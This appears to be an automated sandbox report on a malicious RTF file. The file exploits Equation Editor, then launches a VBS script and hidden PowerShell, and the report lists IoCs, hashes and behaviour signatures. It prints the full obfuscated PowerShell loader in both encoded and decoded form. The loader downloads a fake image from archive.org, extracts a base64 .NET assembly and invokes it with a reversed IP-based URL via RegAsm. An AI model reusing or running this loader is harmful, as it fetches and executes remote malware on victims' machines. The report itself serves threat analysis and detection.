Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-10-2024 13:29
Static task
static1
Behavioral task
behavioral1
Sample
f31ba8351265a427efdf3b2d24ec6fab.rtf
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f31ba8351265a427efdf3b2d24ec6fab.rtf
Resource
win10v2004-20241007-en
General
-
Target
f31ba8351265a427efdf3b2d24ec6fab.rtf
-
Size
97KB
-
MD5
f31ba8351265a427efdf3b2d24ec6fab
-
SHA1
0dc5a1c62306ff5e581a15408edc7ea15433a6d2
-
SHA256
55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040
-
SHA512
1d70947a6fd849db0df28e79ed830a40355c569b4a89cf7e135deed8077f9089f5f4d3f61ea416537895204e24abf2fcc11406385e600d8410e349a1d06ffd20
-
SSDEEP
768:uUz5t/tJy06YV+K2IzBG3ZuE6dHscUgoFixYv9bqsRe:u4Zz4Y4zPJuLdHscUgiixa2
Malware Config
Extracted
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 4 2512 EQNEDT32.EXE 6 2608 powershell.exe 7 2608 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2744 powershell.exe 2608 powershell.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXEEQNEDT32.EXEWScript.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2296 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2744 powershell.exe 2608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2296 WINWORD.EXE 2296 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEdescription pid process target process PID 2512 wrote to memory of 2136 2512 EQNEDT32.EXE WScript.exe PID 2512 wrote to memory of 2136 2512 EQNEDT32.EXE WScript.exe PID 2512 wrote to memory of 2136 2512 EQNEDT32.EXE WScript.exe PID 2512 wrote to memory of 2136 2512 EQNEDT32.EXE WScript.exe PID 2136 wrote to memory of 2744 2136 WScript.exe powershell.exe PID 2136 wrote to memory of 2744 2136 WScript.exe powershell.exe PID 2136 wrote to memory of 2744 2136 WScript.exe powershell.exe PID 2136 wrote to memory of 2744 2136 WScript.exe powershell.exe PID 2744 wrote to memory of 2608 2744 powershell.exe powershell.exe PID 2744 wrote to memory of 2608 2744 powershell.exe powershell.exe PID 2744 wrote to memory of 2608 2744 powershell.exe powershell.exe PID 2744 wrote to memory of 2608 2744 powershell.exe powershell.exe PID 2296 wrote to memory of 1372 2296 WINWORD.EXE splwow64.exe PID 2296 wrote to memory of 1372 2296 WINWORD.EXE splwow64.exe PID 2296 wrote to memory of 1372 2296 WINWORD.EXE splwow64.exe PID 2296 wrote to memory of 1372 2296 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f31ba8351265a427efdf3b2d24ec6fab.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1372
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\servicegoodfornaturalthinggood.vbS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRQc0hvbWVbNF0rJHBTSE9NRVszNF0rJ1gnKSAoICgnY0dmaW1hZ2VVcmwgPSBBekVodHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyLycrJ2l0ZW1zL2RldGFoJysnLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3RlX1YuanBnIEF6RTtjR2Z3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2NHZmltYWdlQnl0ZXMgPSBjR2Z3ZWJDbGllbnQuRG93bicrJ2xvYWREYXRhKGNHJysnZicrJ2ltYWcnKydlVXJsKTtjR2ZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhjR2ZpbWFnZUInKyd5dGUnKydzKTtjR2ZzdGFydEZsYWcgPSBBekU8PEJBU0U2NF9TVEFSVD4+QXpFO2NHZmVuZEZsYWcgPSBBekU8PEJBU0U2NF9FTkQ+PkF6RTtjR2ZzdGFydCcrJ0luZGV4ID0gY0dmaW1hZ2VUZXh0LkluZGV4T2YoY0dmc3RhcnRGbGFnKTtjR2ZlbmRJbmRleCA9IGNHZmltYWdlVGV4dC5JbmRleE9mKGNHZmVuZEZsYWcpO2NHZnN0YXJ0SW5kZXggLWdlIDAgLWFuZCBjR2ZlbmRJbmRleCAtZycrJ3QgY0dmc3RhcnRJbmRleDtjR2ZzdGFydEluZGV4ICs9IGNHZnMnKyd0YXJ0RmxhZy5MZW5ndGg7Y0dmYmFzZTY0TGVuZ3RoID0gY0cnKydmZW5kSW5kZXggLSBjR2ZzdGFydEluZGV4O2NHZmJhc2U2NENvbW1hbmQgPScrJyBjR2ZpbWFnZVRleHQuJysnU3Vic3RyaW5nKGNHZnN0YXJ0SW5kZXgsIGNHZmJhc2U2NExlbmd0aCk7Y0dmY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhjR2ZiYXNlNjQnKydDb21tYW5kKTtjR2Zsb2FkZWRBc3NlbScrJ2JseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoY0dmY29tbWFuZEJ5dGVzKTtjR2Z2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG8nKydkKEF6RVZBSUF6RSk7Y0dmdmFpTWV0aG9kLkludm9rZShjR2ZudWxsLCBAKEF6RXR4dC5HREZSUlcvMzQzMy8wNy41NjEuNDguMy8vOnB0dGhBekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RVJlJysnZ0FzbUF6RSwgQXpFZGVzYXRpdmFkbycrJ0F6RSwgQXpFZGVzYXRpdmFkb0F6RSkpJysnOycpLnJlcExBY0UoKFtDaGFyXTY1K1tDaGFyXTEyMitbQ2hhcl02OSksW1NUcmlOR11bQ2hhcl0zOSkucmVwTEFjRSgoW0NoYXJdOTkrW0NoYXJdNzErW0NoYXJdMTAyKSxbU1RyaU5HXVtDaGFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PsHome[4]+$pSHOME[34]+'X') ( ('cGfimageUrl = AzEhttps://ia600102.us.archive.org/32/'+'items/detah'+'-note-v_202410/DetahNote_V.jpg AzE;cGfwebClient = New-Object System.Net.WebClient;cGfimageBytes = cGfwebClient.Down'+'loadData(cG'+'f'+'imag'+'eUrl);cGfimageText = [System.Text.Encoding]::UTF8.GetString(cGfimageB'+'yte'+'s);cGfstartFlag = AzE<<BASE64_START>>AzE;cGfendFlag = AzE<<BASE64_END>>AzE;cGfstart'+'Index = cGfimageText.IndexOf(cGfstartFlag);cGfendIndex = cGfimageText.IndexOf(cGfendFlag);cGfstartIndex -ge 0 -and cGfendIndex -g'+'t cGfstartIndex;cGfstartIndex += cGfs'+'tartFlag.Length;cGfbase64Length = cG'+'fendIndex - cGfstartIndex;cGfbase64Command ='+' cGfimageText.'+'Substring(cGfstartIndex, cGfbase64Length);cGfcommandBytes = [System.Convert]::FromBase64String(cGfbase64'+'Command);cGfloadedAssem'+'bly = [System'+'.Reflection.Assembly]::Load(cGfcommandBytes);cGfvaiMethod = [dnlib.IO.Home].GetMetho'+'d(AzEVAIAzE);cGfvaiMethod.Invoke(cGfnull, @(AzEtxt.GDFRRW/3433/07.561.48.3//:ptthAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzERe'+'gAsmAzE, AzEdesativado'+'AzE, AzEdesativadoAzE))'+';').repLAcE(([Char]65+[Char]122+[Char]69),[STriNG][Char]39).repLAcE(([Char]99+[Char]71+[Char]102),[STriNG][Char]36))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD551e34ecf86528096ddea776e9025f963
SHA167f7bc75c30826832541c87989bbe928b3adf8d6
SHA2568d8b1c96617491d67363995f4f99fd7b500d03f0fa35ba79b6a9f6434cdbff31
SHA5121a97e0f39bb7a63afa560cb6d73f1f72dcc4c81c9eab6e0f9b71b83de791f5b0c0611176ce844d9711d6c8e20bef7f6d7836e5bc6d8438288ac0440d1e38a1a4
-
Filesize
190KB
MD5b8c00ee73ed137a19e03920a03f80292
SHA1d414493aaa6f1c167409a997f73b0f52fb04c0fa
SHA2560cd60fbe4e65b7cbd036ee3e99507efa509970ab58c632bc49a4bcca2b05bd89
SHA512fa7a2767f17ef3a4a4bfec94f0d3db894ad7d658c582612da295d16e6c970a088a7ee7079798a599847fd49c957f011143e37a5828362c63c0953285839ba3c2